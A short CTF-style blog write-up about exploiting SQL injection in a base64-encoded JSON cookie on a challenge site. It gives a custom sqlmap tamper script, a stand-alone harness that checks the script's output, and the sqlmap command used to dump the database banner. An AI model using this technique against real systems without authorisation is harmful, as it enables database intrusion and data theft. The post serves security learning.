Playing with SQLMap Tamper Script

Dharma Adiputra
2 min read · Dec 24, 2020

Recently, well not so recently, I came across an SQL injection challenge that required me to look into the tamper script feature in SQLMap. The reason was that only part of a parameter was vulnerable, and the existing tamper scripts act on the whole parameter, breaking the entire payload.

For example, I had one cookie that seemed to be vulnerable to SQLi, but only a portion of it needed to be attacked. That portion, "NA==", was the base64-encoded value of "4". It was used to display the last book browsed by the user:

```
userchl2_info={"last_book":"NA==","userchl2":""}
```

Adding an escape character and then base64-encoding the value yielded an error:

MySQL error indicating the parameter is vulnerable to SQLi

Because of the position of the vulnerable parameter (a JSON value inside a cookie), it was not straightforward to exploit with SQLMap. SQLMap was unable to find the vulnerable parameter "last_book":

SQLMap needs help :)

In addition, remember that "last_book" had to be base64-encoded, and the cookie structure had to be preserved as well; otherwise it would not work. My first attempt was to use the tamper script called "base64encode" within /usr/share/sqlmap/tamper, by adding "--tamper=base64encode" to the SQLMap command. However, this had an unwanted side effect:

The whole parameter is encoded

To solve the problem, I created a tamper script that preserved the JSON structure of the cookie. Let's call it mytamper.py and place it in the same folder as the rest of the tamper scripts:

```python
#!/usr/bin/env python
from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

# Priority marker that sqlmap's own tamper scripts declare
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    # Keep the original value "4" in front of the payload and base64-encode
    # the result, exactly as the application expects "last_book" to look
    payload = encodeBase64("4%s" % payload, binary=False)
    # Rebuild the JSON cookie value; "userchl2" stays present and empty
    return '{"last_book":"%s","userchl2":""}' % payload
```
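To check what a tamper script emits before pointing SQLMap at the target, here is an added stand-alone harness (my own code, not from the post or the sqlmap project) that mirrors mytamper.py using only the standard library in place of sqlmap's lib.core.convert, then decodes the result the way the application would. The function and constant names are my own, and the handling of a None payload is an assumption about how sqlmap may call tamper().

```python
import base64
import json

# Cookie layout copied from the post: only "last_book" carries the payload,
# "userchl2" must stay present and empty.
COOKIE_KEYS = ("last_book", "userchl2")
ORIGINAL_VALUE = "4"  # what "NA==" decodes to in the untouched cookie


def encode_base64(value: str) -> str:
    """Stand-in for sqlmap's lib.core.convert.encodeBase64(value, binary=False)."""
    return base64.b64encode(value.encode("utf-8")).decode("ascii")


def tamper(payload, **kwargs):
    """Same logic as mytamper.py: keep the original value "4" in front of the
    payload, base64-encode it and rebuild the JSON cookie value."""
    # Assumption: sqlmap may call tamper() with payload=None; treat it as empty.
    payload = payload or ""
    cookie = {
        "last_book": encode_base64(ORIGINAL_VALUE + payload),
        "userchl2": "",
    }
    # Compact separators reproduce the exact format of the original cookie.
    return json.dumps(cookie, separators=(",", ":"))


def unwrap(cookie_value: str) -> str:
    """The application's view: parse the JSON and base64-decode last_book."""
    data = json.loads(cookie_value)
    return base64.b64decode(data["last_book"]).decode("utf-8")


def check_roundtrip(payload: str) -> bool:
    """True when the tamper output decodes back to "4" + payload and the
    untouched key survived, i.e. structure and encoding are both intact."""
    wrapped = tamper(payload)
    data = json.loads(wrapped)
    return (
        tuple(data) == COOKIE_KEYS
        and data["userchl2"] == ""
        and unwrap(wrapped) == ORIGINAL_VALUE + payload
    )


if __name__ == "__main__":
    # With an empty payload the output must equal the original cookie value.
    print(tamper(""))            # {"last_book":"NA==","userchl2":""}
    print(check_roundtrip("'"))  # True
```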

Then I instructed SQLMap to use this tamper script.

Looking good :)

Now, let’s grab the banner!

```shell
sqlmap -u "http://2.challenge.sqli.site/view_book.php?id=3" --cookie="userchl2_info=" -p userchl2_info --level=2 --dbms=mysql --tamper=mytamper --banner
```

Success!

Tamper scripts can be used in situations where payloads need to follow a certain format, and they are great 😊
